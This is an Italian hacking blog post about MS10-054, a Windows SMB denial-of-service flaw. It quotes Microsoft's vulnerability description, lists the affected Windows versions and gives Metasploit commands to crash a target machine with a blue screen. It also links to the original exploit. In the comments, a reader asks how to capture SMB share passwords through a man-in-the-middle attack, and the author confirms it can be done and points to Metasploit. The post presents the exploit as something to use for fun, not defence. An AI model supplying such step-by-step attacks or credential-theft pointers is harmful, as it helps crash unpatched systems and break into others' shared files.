ClsHack:Computer Security Blog    

[MS10-054]Metasploit:Remote DOS Microsoft SMB Server Trans2

Posted on: 12 August 2010

E il nostro amico g-laurent, famoso per i suoi exploit ha scoperto una nuova vulnerabilità del protocollo SMB di windows :P

Cosa possiamo fare con questo exploit o.O ?

Dal sito microsoft:

Vulnerability details

In order to exploit CVE-2010-2550, the attacker must have read permission on a SMB share on the target system. This implies that the attacker is authenticated, or that the target allows anonymous access to network shares (this is a default configuration only on Windows XP with later platforms requiring authentication by default)


By sending a specially crafted SMB request to the target, an attacker with read access could cause a kernel pool block to be overrun. This is due to an attacker-provided length being used as the size value in an allocation call. If an attacker specifies a small size value, the system will later write data to this buffer, which will corrupt the adjacent pool block(s). The data used in the overwrite comes from the disk or file system on the target machine.

Quindi, causiamo una schermata blue :D

Sistemi affetti:

Windows:

  • 2000
  • XP
  • 2003
  • Vista
  • 2008
  • 7
  • 2008R2

Vediamo come usare questo exploit, con metasploit :D

Aggiorniamo:
sudo svn update
Usiamo l’exploit:
use auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow
Settiamo l’ip vittima:
set RHOST 192.168.1.154
La condivisione:(nel mio caso users)
set SMBSHARE Users
E lanciamo l’exploit:
exploit

Avrete la schermata c’è nella immagine sopra se tutto va bene :D

DOWNLOAD POC/EXPLOIT ORIGINALE

Related posts:

  1. [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction
  2. IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
  3. [EXPLOIT]Windows Help Centre Remote code Excution
  4. [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution
  5. [Metasploit]Sun Java Web Start Plugin Remote Code Excution

This entry was posted on Thursday, August 12th, 2010 at 12:17 pm and is filed under Hacking, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with:
  • wewe

    scusa ma da remoto nn funziona giusto …………

  • clshack_

    giusto ….

  • Honik

    Ciao clshack…
    volevo sapere se attraverso un attacco MITM e poi analizzando i giusti pacchetti si può ricavare la password delle cartelle condivise su windows.. quindi suppongo la passwd di SMB / SMB2 in maniera tale di poter entrare nelle risorse condivise.. oppure c’è un’altro modo?
    Grazieee e ciao

  • clshack_

    si si può ricavare ti consiglio di guardare su metasploit :)

    E questo tuotrial:

    http://www.clshack.it/metasploit-how-to-auxiliary-scanner.html